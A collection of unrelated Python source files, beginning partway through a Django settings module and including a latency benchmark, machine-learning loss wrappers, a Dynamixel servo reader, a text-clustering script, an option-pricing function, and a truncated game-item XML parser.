'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'ac_mediator.wsgi.application' # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.10/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Europe/Madrid' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.10/howto/static-files/ STATIC_URL = '/static/' STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")] STATIC_ROOT = '/static/' # API settings ALLOW_UNAUTHENTICATED_API_REQUESTS_ON_DEBUG = True REST_FRAMEWORK = { 'DEFAULT_RENDERER_CLASSES': ('rest_framework.renderers.JSONRenderer',), 'DEFAULT_AUTHENTICATION_CLASSES': ( 'oauth2_provider.ext.rest_framework.OAuth2Authentication', ), 'DEFAULT_PERMISSION_CLASSES': ( 'rest_framework.permissions.IsAuthenticated' if not DEBUG or not ALLOW_UNAUTHENTICATED_API_REQUESTS_ON_DEBUG else 'rest_framework.permissions.AllowAny', ), 'EXCEPTION_HANDLER': 'api.utils.custom_exception_handler', 'URL_FORMAT_OVERRIDE': None, # disable DRF use of 'format' parameter (we have our own) } OAUTH2_PROVIDER_APPLICATION_MODEL = 'api.ApiClient' OAUTH2_PROVIDER = { 'ACCESS_TOKEN_EXPIRE_SECONDS': 60*60*24, # 1 day 'REFRESH_TOKEN_EXPIRE_SECONDS': 60*60*15, # 2 weeks 'AUTHORIZATION_CODE_EXPIRE_SECONDS': 10*60, # 10 minutes 'SCOPES': {'read': 'Read scope'}, 'OAUTH2_VALIDATOR_CLASS': 'api.utils.ACOAuth2Validator', } JSON_LD_FORMAT_KEY = 'jsonld' JSON_FORMAT_KEY = 'json' DEFAULT_RESPONSE_FORMAT = JSON_FORMAT_KEY # Registration AUTH_USER_MODEL = 'accounts.Account' LOGIN_URL = '/login/' LOGOUT_URL = '/' LOGIN_REDIRECT_URL = '/' # Site BASE_URL = os.getenv('DJANGO_BASE_URL', 'http://example.com') # Documentation DOCS_ROOT = os.path.join(BASE_DIR, 'docs/_build/html') DOCS_ACCESS = 'public' # Redis REDIS_HOST = 'redis' # Host where redis is running (we use docker alias here) REDIS_PORT = 6379 # Celery CELERY_BROKER_URL = "redis://redis" CELERY_RESULT_BACKEND = "redis://redis" CELERY_ACCEPT_CONTENT = ['json'] CELERY_TIMEZONE = 'Europe/Madrid' # Set this to False so that requests are submitted sequentially and from the webserver when in DEBUG mode instead of # in parallel and using Celery. This can be useful so that Celery workers don't need to be restarted when making # changes to the code USE_CELERY_IN_DEBUG_MODE = False # Shared respones backend and async responses DELETE_RESPONSES_AFTER_CONSUMED = False RESPONSE_EXPIRY_TIME = 3600*24 # Response objects are deleted after 24 hours RAVEN_CONFIG = { 'dsn': os.getenv('SENTRY_DSN', None), } # Email configuration DEFAULT_FROM_EMAIL = 'Audio Commons <[email protected]>' EMAIL_SUBJECT_PREFIX = '[AudioCommons] ' EMAIL_HOST = 'smtp-rec.upf.edu' EMAIL_PORT = 25 if DEBUG: # In development environment, use email file backend EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend' EMAIL_FILE_PATH = os.path.join(BASE_DIR, "mail") # Logging LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'simple': { 'format': '%(levelname)s %(message)s' }, 'simplest': { 'format': '%(message)s' }, }, 'filters': { 'require_debug_true': { '()': 'django.utils.log.RequireDebugTrue', }, }, 'handlers': { 'stdout': { 'level': 'INFO', 'filters': ['require_debug_true'], 'class': 'logging.StreamHandler', 'formatter': 'simple', }, 'gelf': { 'class': 'logging.NullHandler', # This will be redefined later if configuration is provided }, }, 'loggers': { 'management': { 'handlers': ['stdout', 'gelf'], 'level': 'INFO', 'propagate': False, }, }, } if DEBUG: # In development we log all requests made into a file LOGS_BASE_DIR = os.path.join(BASE_DIR, 'logs') if not os.path.exists(LOGS_BASE_DIR): os.makedirs(LOGS_BASE_DIR) LOGGING['handlers'].update({ 'logfile_requests': { 'class': 'logging.FileHandler', 'filename': os.path.join(LOGS_BASE_DIR, 'requests.log'), 'formatter': 'simplest' } }) LOGGING['loggers'].update({ 'requests_sent': { 'handlers': ['logfile_requests'], 'level': 'INFO', 'propagate': False, } }) # Read logserver config settings, if present, then update the corresponding handler GELF_IP_ADDRESS = os.getenv('GELF_IP_ADDRESS', None) GELF_PORT = int(os.getenv('GELF_PORT', 0)) if GELF_IP_ADDRESS is not None and GELF_PORT is not None: LOGGING['handlers'].update( { 'gelf': { 'level': 'INFO', 'class': 'graypy.GELFHandler', 'host': GELF_IP_ADDRESS, 'port': GELF_PORT, 'formatter': 'simple', }, } )
python
import time import aiohttp import asyncio import statistics runs = [] async def fetch(session, url): async with session.get(url) as response: return await response.text() async def main(loop): for i in range(3): latencies = [] expected_response = ','.join(['OK']*100) async def iterate(): nonlocal latencies start = time.time() async with aiohttp.ClientSession() as session: response = await fetch(session, 'http://localhost:1995') try: assert response == expected_response except AssertionError as e: print(e) latencies.append(time.time() - start) coroutines = [asyncio.create_task(iterate()) for _ in range(100)] await asyncio.gather(*coroutines) runs.append((statistics.mean(latencies), statistics.stdev(latencies), max(latencies))) loop = asyncio.get_event_loop() loop.run_until_complete(main(loop)) print(f"Mean Latency: {statistics.mean([run[0] for run in runs])}, Standard Deviation: {statistics.mean([run[1] for run in runs])}, Max Latency: {statistics.mean([run[2] for run in runs])}")
python
import logging import torch.nn from torch_scatter import scatter from nequip.data import AtomicDataDict from nequip.utils import instantiate_from_cls_name class SimpleLoss: """wrapper to compute weighted loss function if atomic_weight_on is True, the loss function will search for AtomicDataDict.WEIGHTS_KEY+key in the reference data. Args: func_name (str): any loss function defined in torch.nn that takes "reduction=none" as init argument, uses prediction tensor, and reference tensor for its call functions, and outputs a vector with the same shape as pred/ref params (str): arguments needed to initialize the function above """ def __init__(self, func_name: str, params: dict = {}): func, _ = instantiate_from_cls_name( torch.nn, class_name=func_name, prefix="", positional_args=dict(reduction="none"), optional_args=params, all_args={}, ) self.func = func def __call__( self, pred: dict, ref: dict, key: str, atomic_weight_on: bool = False, mean: bool = True, ): loss = self.func(pred[key], ref[key]) weights_key = AtomicDataDict.WEIGHTS_KEY + key if weights_key in ref and atomic_weight_on: weights = ref[weights_key] # TO DO if mean: return (loss * weights).mean() / weights.mean() else: raise NotImplementedError( "metrics and running stat needs to be compatible with this" ) return loss * weights, weights else: if mean: return loss.mean() else: return loss return loss class PerSpeciesLoss(SimpleLoss): """Compute loss for each species and average among the same species before summing them up. Args same as SimpleLoss """ def __call__( self, pred: dict, ref: dict, key: str, atomic_weight_on: bool = False, mean: bool = True, ): if not mean: raise NotImplementedError("cannot handle this yet") per_atom_loss = self.func(pred[key], ref[key]) per_atom_loss = per_atom_loss.mean(dim=-1, keepdim=True) # if there is atomic weights weights_key = AtomicDataDict.WEIGHTS_KEY + key if weights_key in ref and atomic_weight_on: weights = ref[weights_key] per_atom_loss = per_atom_loss * weights else: atomic_weight_on = False species_index = pred[AtomicDataDict.SPECIES_INDEX_KEY] _, inverse_species_index = torch.unique(species_index, return_inverse=True) if atomic_weight_on: # TO DO per_species_weight = scatter(weights, inverse_species_index, dim=0) per_species_loss = scatter(per_atom_loss, inverse_species_index, dim=0) return (per_species_loss / per_species_weight).mean() else: return scatter( per_atom_loss, inverse_species_index, reduce="mean", dim=0 ).mean() def find_loss_function(name: str, params): wrapper_list = dict( PerSpecies=PerSpeciesLoss, ) if isinstance(name, str): for key in wrapper_list: if name.startswith(key): logging.debug(f"create loss instance {wrapper_list[key]}") return wrapper_list[key](name[len(key) :], params) return SimpleLoss(name, params) elif callable(name): return name else: raise NotImplementedError(f"{name} Loss is not implemented")
python
#!/usr/bin/env python # -*- coding: utf-8 -*- ################################################################################ # Copyright 2017 ROBOTIS CO., LTD. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ################################################################################ # Author: Ryu Woon Jung (Leon) from .robotis_def import * class GroupSyncRead: def __init__(self, port, ph, start_address, data_length): self.port = port self.ph = ph self.start_address = start_address self.data_length = data_length self.last_result = False self.is_param_changed = False self.param = [] self.data_dict = {} self.clearParam() def makeParam(self): if self.ph.getProtocolVersion() == 1.0: return if not self.data_dict: # len(self.data_dict.keys()) == 0: return self.param = [] for dxl_id in self.data_dict: self.param.append(dxl_id) def addParam(self, dxl_id): if self.ph.getProtocolVersion() == 1.0: return False if dxl_id in self.data_dict: # dxl_id already exist return False self.data_dict[dxl_id] = [] # [0] * self.data_length self.is_param_changed = True return True def removeParam(self, dxl_id): if self.ph.getProtocolVersion() == 1.0: return if dxl_id not in self.data_dict: # NOT exist return del self.data_dict[dxl_id] self.is_param_changed = True def clearParam(self): if self.ph.getProtocolVersion() == 1.0: return self.data_dict.clear() def txPacket(self): if self.ph.getProtocolVersion() == 1.0 or len(self.data_dict.keys()) == 0: return COMM_NOT_AVAILABLE if self.is_param_changed is True or not self.param: self.makeParam() return self.ph.syncReadTx(self.port, self.start_address, self.data_length, self.param, len(self.data_dict.keys()) * 1) def rxPacket(self): self.last_result = False if self.ph.getProtocolVersion() == 1.0: return COMM_NOT_AVAILABLE result = COMM_RX_FAIL if len(self.data_dict.keys()) == 0: return COMM_NOT_AVAILABLE for dxl_id in self.data_dict: self.data_dict[dxl_id], result, _ = self.ph.readRx(self.port, dxl_id, self.data_length) if result != COMM_SUCCESS: return result if result == COMM_SUCCESS: self.last_result = True return result def txRxPacket(self): if self.ph.getProtocolVersion() == 1.0: return COMM_NOT_AVAILABLE result = self.txPacket() if result != COMM_SUCCESS: return result return self.rxPacket() def isAvailable(self, dxl_id, address, data_length): if self.ph.getProtocolVersion() == 1.0 or self.last_result is False or dxl_id not in self.data_dict: return False if (address < self.start_address) or (self.start_address + self.data_length - data_length < address): return False return True def getData(self, dxl_id, address, data_length): if not self.isAvailable(dxl_id, address, data_length): return 0 if data_length == 1: return self.data_dict[dxl_id][address - self.start_address] elif data_length == 2: return DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address], self.data_dict[dxl_id][address - self.start_address + 1]) elif data_length == 4: return DXL_MAKEDWORD(DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address + 0], self.data_dict[dxl_id][address - self.start_address + 1]), DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address + 2], self.data_dict[dxl_id][address - self.start_address + 3])) else: return 0
python
import pandas as pd import S3Api from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, ENGLISH_STOP_WORDS from sklearn.cluster import KMeans import matplotlib.pyplot as plt from sklearn import metrics from sklearn.decomposition import PCA import numpy as np import plotly.express as px from sklearn import preprocessing from sklearn.cluster import AgglomerativeClustering import plotly.figure_factory as ff from sklearn.cluster import DBSCAN import os import glob import codecs STORE_DATA = True class CustomSearchClustering: def __init__(self, file_storage, s3_api): """ Create a new instance of the CustomSearchData class Parameters ---------- :param file_storage: FileStorage, Required The file storage class used to store raw/processed data :param s3_api: S3_API, Required The S3 api wrapper class used to store data in AWS S3 ---------- """ self._file_storage = file_storage self._s3_api = s3_api self.__processed_data_location = 'processed_data/search_results/cleaned_search_data.csv' self.__processed_pdf_data_location = '/Users/sampastoriza/Documents/Programming/DataScienceDevelopment/DataSciencePortfolioCode/PandemicComparison/processed_data/corpus_data/cleaned_corpus_data.csv' self.__clustered_visualizations_location = 'clustered_data_visualizations/search_results' self.__clustered_data_location = 'clustered_data/search_results' self._additional_stop_words = ['title', 'journal', 'volume', 'author', 'scholar', 'article', 'issue'] self._other_k_values = [3, 4, 6, 8, 10] def cluster_search_data(self): self.__clean_clustered_visualizations() processed_df = pd.read_csv(self.__processed_data_location, index_col=False) processed_pdf_df = pd.read_csv(self.__processed_pdf_data_location, index_col=False) processed_df = pd.concat([processed_df, processed_pdf_df], ignore_index=True) processed_df.to_csv('processed_data/search_results/combined_search_data.csv', index=False) print(processed_df.head()) stop_words = ENGLISH_STOP_WORDS.union(self._additional_stop_words) print('----------------------------------') print('Trying count vectorizer...') print('----------------------------------') vectorizer = CountVectorizer(stop_words=stop_words) self.__cluster_using_vectorizer(processed_df, vectorizer, 'count') print('----------------------------------') print('Trying td vectorizer...') print('----------------------------------') vectorizer = TfidfVectorizer(stop_words=stop_words) self.__cluster_using_vectorizer(processed_df, vectorizer, 'tfidf') def __clean_clustered_visualizations(self): all_files = list(glob.iglob(f'{self.__clustered_visualizations_location}/**/*.html', recursive=True)) + \ list(glob.iglob(f'{self.__clustered_visualizations_location}/**/*.png', recursive=True)) print('Remove all files in the directory', all_files) for f in all_files: os.remove(f) def __cluster_using_vectorizer(self, df, vectorizer, vectorizer_type): normalized_label = f'normalized_{vectorizer_type}' not_normalized_label = f'not_{normalized_label}' v = vectorizer.fit_transform(df['text']) vocab = vectorizer.get_feature_names() values = v.toarray() v_df = pd.DataFrame(values, columns=vocab) print('----------------------------------') print('Non normalized data') print('----------------------------------') df_not_normalized = pd.DataFrame(v_df) self.__cluster(df_not_normalized, df, not_normalized_label, 'Not Normalized', vectorizer_type) pca_analysis_results_nn = self.__run_pca_analysis(df_not_normalized, df) df['PC0_NN'] = pca_analysis_results_nn['PC0'] df['PC1_NN'] = pca_analysis_results_nn['PC1'] df['PC2_NN'] = pca_analysis_results_nn['PC2'] print('----------------------------------') print('Normalized data') print('----------------------------------') df_normalized = pd.DataFrame(preprocessing.normalize(v_df)) self.__cluster(df_normalized, df, normalized_label, 'Normalized', vectorizer_type) pca_analysis_results_n = self.__run_pca_analysis(df_normalized, df) self.__run_density_clustering(df_normalized, df, normalized_label) df['PC0_N'] = pca_analysis_results_n['PC0'] df['PC1_N'] = pca_analysis_results_n['PC1'] df['PC2_N'] = pca_analysis_results_n['PC2'] print('Plotting clusters using k-means, hierarchical, and density scan') self.__plot_clusters(df, f'{normalized_label}_calculated_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_3_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means (k=3) ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_4_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means (k=4) ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_6_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means (k=6) ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_8_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means (k=8) ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_10_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means (k=10) ({vectorizer_type})') self.__plot_clusters(df, f'{not_normalized_label}_calculated_k_means', 'PC0_NN', 'PC1_NN', 'PC2_NN', f'Plot of non normalized clusters using K-Means ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_3_hierarchical', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Hiearchical Clustering ({vectorizer_type}) (k=3)') self.__plot_clusters(df, f'{normalized_label}_4_hierarchical', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Hiearchical Clustering ({vectorizer_type}) (k=4)') self.__plot_clusters(df, f'{normalized_label}_6_hierarchical', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Hiearchical Clustering ({vectorizer_type}) (k=6)') self.__plot_clusters(df, f'{normalized_label}_8_hierarchical', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Hiearchical Clustering ({vectorizer_type}) (k=8)') self.__plot_clusters(df, f'{normalized_label}_10_hierarchical', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Hiearchical Clustering ({vectorizer_type}) (k=10)') self.__plot_clusters(df, f'{normalized_label}_density', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Density Scan ({vectorizer_type})') df = df.drop(columns=['text']) df.to_csv(f'{self.__clustered_data_location}/clustered_search_data.csv', index=False) def __cluster(self, df, input_df, clustering_type, graph_prefix, vectorizer_type): list_of_inertias = [] list_of_silhouette_scores = [] k_range = list(range(2, 10)) for k in k_range: k_means = KMeans(k, max_iter=1000) k_means.fit_predict(df) list_of_inertias.append(k_means.inertia_) score = metrics.silhouette_score(df, k_means.labels_, metric='correlation') list_of_silhouette_scores.append(score) self.plot_elbow_method(k_range, list_of_inertias, graph_prefix, vectorizer_type, clustering_type) self.plot_silhouette_method(k_range, list_of_silhouette_scores, graph_prefix, vectorizer_type, clustering_type) k_range_np = np.array(k_range) sil_scores = np.array(list_of_silhouette_scores) # Find the max k-value from the silhouette scores k_value = k_range_np[sil_scores == np.max(sil_scores)][0] print('Max k-value', k_value) k_means = KMeans(k_value).fit(df) k_means_label = f'{clustering_type}_calculated_k_means_label' input_df[k_means_label] = k_means.labels_ self.__plot_silhouette_clusters(df, k_means, k_value, vectorizer_type, clustering_type) print('Analysing 5 other random k values for comparison purposes', self._other_k_values) for random_k_value in self._other_k_values: k_means_r = KMeans(random_k_value).fit(df) k_means_label_r = f'{clustering_type}_{random_k_value}_k_means_label' input_df[k_means_label_r] = k_means_r.labels_ self.__plot_silhouette_clusters(df, k_means_r, random_k_value, vectorizer_type, clustering_type) self.__run_hierarchical_clustering(df, 3, input_df, clustering_type) self.__run_hierarchical_clustering(df, 4, input_df, clustering_type) self.__run_hierarchical_clustering(df, 6, input_df, clustering_type) self.__run_hierarchical_clustering(df, 8, input_df, clustering_type) self.__run_hierarchical_clustering(df, 10, input_df, clustering_type) self.__plot_dendrogram(df, input_df, clustering_type, vectorizer_type) def plot_elbow_method(self, k_range, list_of_inertias, graph_prefix, vectorizer_type, clustering_type): print('Plotting elbow method') plt.figure() plt.plot(k_range, list_of_inertias, 'bx-') plt.xlabel('k') plt.ylabel('Inertia') plt.title(f'Plot of elbow method using Inertia -- {graph_prefix} ({vectorizer_type})') plt.savefig(f'{self.__clustered_visualizations_location}/elbow_method/elbow_method_{clustering_type}.png') df = pd.DataFrame(data={'K': k_range, 'Inertia': list_of_inertias}) df.to_csv(f'{self.__clustered_data_location}/elbow_method/elbow_method_{clustering_type}.csv', index=False) def plot_silhouette_method(self, k_range, list_of_silhouette_scores, graph_prefix, vectorizer_type, clustering_type): print('Plotting silhouette method') plt.figure() plt.plot(k_range, list_of_silhouette_scores, 'bx-') plt.xlabel('k') plt.ylabel('Silhouette Score') plt.title(f'Plot of silhouette method -- {graph_prefix} ({vectorizer_type})') plt.savefig(f'{self.__clustered_visualizations_location}/silhouette_method/silhouette_method_{clustering_type}.png') df = pd.DataFrame(data={'K': k_range, 'Silhouette Score': list_of_silhouette_scores}) df.to_csv(f'{self.__clustered_data_location}/silhouette_method/silhouette_method_{clustering_type}.csv', index=False) def __run_pca_analysis(self, df_normalized, input_df): print('Running PCA Analysis to reduce dimensionality') text_pca = PCA(n_components=3) df_normalized = np.transpose(df_normalized) text_pca.fit(df_normalized) components = pd.DataFrame(text_pca.components_.T, columns=['PC%s' % _ for _ in range(3)]) components['topic'] = input_df['topic'] return components def clusterByTopic(self, cluster, topic): return cluster.value_counts()[topic] if topic in cluster.value_counts() else 0 def __plot_clusters(self, df, clustering_type, x, y, z, title): k_means_label = f'{clustering_type}_label' fig = px.scatter(df, x=x, y=y, text="topic", color=k_means_label, hover_data=['topic', 'link'], log_x=True, size_max=60) fig.update_traces(textposition='top center') fig.update_layout( height=800, title_text=title ) output_file = f'{self.__clustered_visualizations_location}/clustered_2d/{clustering_type}.html' fig.write_html(output_file) fig3d = px.scatter_3d(df, x=x, y=y, z=z, text="topic", color=k_means_label, hover_data=['topic', 'link'],) fig3d.update_traces(textposition='top center') fig3d.update_layout( height=800, title_text=title ) output_file = f'{self.__clustered_visualizations_location}/clustered_3d/{clustering_type}.html' fig3d.write_html(output_file) print('Gathering Statistics') statistics_df = df[['topic', k_means_label]].groupby([k_means_label]).agg( covid=pd.NamedAgg(column='topic', aggfunc=lambda t: self.clusterByTopic(t, 'covid')), drought=pd.NamedAgg(column='topic', aggfunc=lambda t: self.clusterByTopic(t, 'drought')), locusts=pd.NamedAgg(column='topic', aggfunc=lambda t: self.clusterByTopic(t, 'locusts')), ebola=pd.NamedAgg(column='topic', aggfunc=lambda t: self.clusterByTopic(t, 'ebola')) ) statistics_df['Cluster'] = [i for i in range(statistics_df.shape[0])] output_file = f'{self.__clustered_data_location}/clustering_statistics/{clustering_type}.csv' statistics_df.to_csv(output_file, index=False) print(statistics_df) def __plot_silhouette_clusters(self, df, k_means, k_value, vectorizer_type, clustering_type): print('Plotting silhouette clusters', k_value) plt.figure() # get silhouette scores sil_coe = metrics.silhouette_samples(df, k_means.labels_) sil_score = metrics.silhouette_score(df, k_means.labels_) # create subplots and define range low_range = 0 up_range = 0 # plot bar plot for each cluster for cluster in set(k_means.labels_): cluster_coefs = sil_coe[k_means.labels_ == cluster] cluster_coefs.sort() up_range += len(cluster_coefs) plt.barh(range(low_range, up_range), cluster_coefs, height=1) plt.text(-0.05, (up_range + low_range) / 2, str(cluster)) low_range += len(cluster_coefs) plt.suptitle("Silhouette Coefficients for k = " + str(k_value) + " -- Vectorizer Type = " + vectorizer_type + "\n Score = " + str(round(sil_score, 2)), y=1) plt.title("Coefficient Plots") plt.xlabel("Silhouette Coefficients") plt.ylabel("Cluster") plt.yticks([]) plt.axvline(sil_score, color="red", linestyle="--") plt.savefig(f'{self.__clustered_visualizations_location}/silhouette/silhouette_cluster_{k_value}_{clustering_type}.png') def __run_hierarchical_clustering(self, df, k_value, input_df, clustering_type): print('Running hierarchical clustering with k =', k_value) clustered_data = AgglomerativeClustering(n_clusters=k_value, affinity='euclidean', linkage='ward') fitted_data = clustered_data.fit(df) input_df[f'{clustering_type}_{k_value}_hierarchical_label'] = fitted_data.labels_ def __plot_dendrogram(self, df, input_df, clustering_type, vectorizer_type): print('Plotting dendrogram') fig = ff.create_dendrogram(df, labels=input_df['topic'].to_list()) fig.update_layout(width=800, height=500, title=f'Hierarchical Clustering Dendrogram with ' f'Vectorizer Type = {vectorizer_type}') output_file = f'{self.__clustered_visualizations_location}/dendrogram/dendrogram_{clustering_type}.html' fig.write_html(output_file) def __run_density_clustering(self, df, input_df, clustering_type): print('Running density clustering') max_clusters = 0 associated_labels = [] for i in map(lambda x: x / 10.0, range(2, 20, 2)): for j in range(5, 40): set_of_labels = DBSCAN(eps=i, min_samples=j, metric='cosine').fit(df).labels_ if len(set(set_of_labels)) >= max_clusters: max_clusters = len(set(set_of_labels)) associated_labels = set_of_labels input_df[f'{clustering_type}_density_label'] = associated_labels print('Number of clusters for density', len(set(associated_labels))) def store_clustered_search_data(self): print('Store processed survey data in S3') html_visualizations = list(glob.iglob(f'{self.__clustered_visualizations_location}/**/*.html', recursive=True)) for file in html_visualizations: print('Opening file', file) contents = codecs.open(file, 'r') print('Uploading', file, 'to S3') self._s3_api.upload_html(contents.read(), file.replace('clustered_data_visualizations/', ''), S3Api.S3Location.CLUSTERED_DATA_VISUALIZATIONS) contents.close() png_visualizations = list(glob.iglob(f'{self.__clustered_visualizations_location}/**/*.png', recursive=True)) for file in png_visualizations: print('Opening file', file) png = open(file, "rb") print('Attempting to upload clustered visualized search data to s3') self._s3_api.upload_png(png, file.replace('clustered_data_visualizations/', ''), S3Api.S3Location.CLUSTERED_DATA_VISUALIZATIONS) print('Uploading', file, 'to S3') print('Successfully uploaded') png.close() clustered_csv_data = list(glob.iglob(f'{self.__clustered_data_location}/**/*.csv', recursive=True)) for file in clustered_csv_data: print('Opening file', file) df = pd.read_csv(file) print('Attempting to upload clustered search data to s3') self._s3_api.upload_df(df, file.replace('clustered_data/', ''), S3Api.S3Location.CLUSTERED_DATA) print('Uploading', file, 'to S3') print('Successfully uploaded') print('Uploaded all files') if __name__ == '__main__': from dotenv import load_dotenv from FileStorage import FileStorage load_dotenv() fs = FileStorage() fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/elbow_method/') fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/silhouette_method/') fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/clustered_2d/') fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/clustered_3d/') fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/silhouette/') fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/dendrogram/') fs.create_directory_if_not_exists('clustered_data/search_results/clustering_statistics/') fs.create_directory_if_not_exists('clustered_data/search_results/elbow_method/') fs.create_directory_if_not_exists('clustered_data/search_results/silhouette_method/') search_clustering = CustomSearchClustering(fs, S3Api.S3Api()) search_clustering.cluster_search_data() if STORE_DATA: search_clustering.store_clustered_search_data()
python
# -*- coding: utf-8 -*- """ Created on Mon Jan 15 17:35:51 2018 @author: Dr Kaustav Das ([email protected]) """ # import numpy as np import copy as cp from math import sqrt, exp, log from collections import deque from scipy.stats import norm # Computes the usual Black Scholes Put/Call formula (not PutBS) for piecewise-constant # parameters. # S0 (float): initial spot. # sig (float): initial volatility. # Strk (float): strike value of the contract. # rd_deque (deque): domestic interest rate, given backward, e.g., rd_deque = deque([rd2, rd1]). # rf_deque (deque): foreign interest rate, given backward, e.g., rf_deque = deque([rf2, rf1]). # dt (deque): deque of time increments over which each parameter is 'alive', # given backward, e.g., dt = deque([dt2, dt1]). Note sum(dt) gives option maturity T. # option (str): 'Put' or 'Call'. def BSform_pw(S0, sig, Strk, _rd_deque, _rf_deque, _dt, option): # Copy deques rd_deque = cp.copy(_rd_deque) rf_deque = cp.copy(_rf_deque) dt = cp.copy(_dt) # We now compute discretised versions of int (rd - rf)dt, e^(-int rd dt) # and e^(-int rf dt), as well as T rsumdt = 0 expmrd = 1 expmrf = 1 T = 0 lastlayer = deque([]) while dt != lastlayer: DT = dt.popleft() RD = rd_deque.popleft() RF = rf_deque.popleft() R = RD - RF rsumdt += R*DT expmrd *= exp(-DT*RD) expmrf *= exp(-DT*RF) T += DT sqrtT = sqrt(T) sigsqrtT = sig*sqrtT lograt = log(S0/Strk) dpl = (lograt + rsumdt)/sigsqrtT+ 0.5*sigsqrtT dm = dpl - sigsqrtT if option == 'Put': H = Strk*expmrd*norm.cdf(-1.0*dm) - S0*expmrf*norm.cdf(-1.0*dpl) elif option == 'Call': H = S0*expmrf*norm.cdf(dpl) - Strk*expmrd*norm.cdf(dm) return H # Example code. if __name__ == '__main__': S0 = 100 sig = 0.20 Strk = S0*1.01 rd3 = 0.02 rd2 = 0.01 rd1 = 0.01 rf3 = 0.00 rf2 = 0.00 rf1 = 0.00 dt3 = 1/12 dt2 = 1/12 dt1 = 1/12 rd_deque = deque([rd3, rd2, rd1]) rf_deque = deque([rf3, rf2, rf1]) dt = deque([dt3, dt2, dt1]) option = 'Put' print(BSform_pw(S0, sig, Strk, rd_deque, rf_deque, dt, option))
python
import xml.etree.ElementTree as ET import traceback def build_crafting_lookup(): # TODO: Keep working on this, I think only one ingredient is in the list currently. """ Returns a crafting lookup table :return: """ crafting_dict = {} itemtree = ET.parse('libs/game_data/items.xml') itemroot = itemtree.getroot() for item in itemroot.getchildren(): # Check if item is craftable crafting_requirements = item.findall('craftingrequirements') print(item.attrib['uniquename']) # If this is greater than 0, there's items that can craft into this item if len(crafting_requirements) > 0: recipes = [] for recipe in crafting_requirements: recipe_dict = {} for ingredient in recipe.getchildren(): recipe_dict['uniquename'] = ingredient.attrib['uniquename'] recipe_dict['count'] = ingredient.attrib['count'] recipes.append(recipe_dict) print(recipes) def build_item_lookup(localization_dictionary): """ Creates a dictionary of items with the localization provided. :return: dictionary of items """ item_xml = ET.parse('libs/game_data/items.xml') item_root = item_xml.getroot() items = item_root.getchildren() """ Example Item Format: (T2_2H_Bow) In [29]: ri Out[29]: <Element 'weapon' at 0x7fd2afa6b688> In [30]: ri.attrib Out[30]: {'abilitypower': '120', 'activespellslots': '3', 'attackdamage': '29', 'attackrange': '11', 'attackspeed': '1', 'attacktype': 'ranged', 'durability': '5647', 'durabilityloss_attack': '1', 'durabilityloss_receivedattack': '1', 'durabilityloss_receivedspell': '1', 'durabilityloss_spelluse': '1', 'focusfireprotectionpeneration': '0', 'fxbonename': 'LeftArm_3', 'fxboneoffset': '0.2 -0.227 0.135', 'hitpointsmax': '0', 'hitpointsregenerationbonus': '0', 'itempower': '300', 'itempowerprogressiontype': 'mainhand', 'magicspelldamagebonus': '0', 'mainhandanimationtype': 'bow', 'maxqualitylevel': '5', 'passivespellslots': '1', 'physicalspelldamagebonus': '0', 'shopcategory': 'ranged', 'shopsubcategory1': 'bow', 'slottype': 'mainhand', 'tier': '2', 'twohanded': 'true', 'uiatlas': 'RefItemAtlas', 'uniquename': 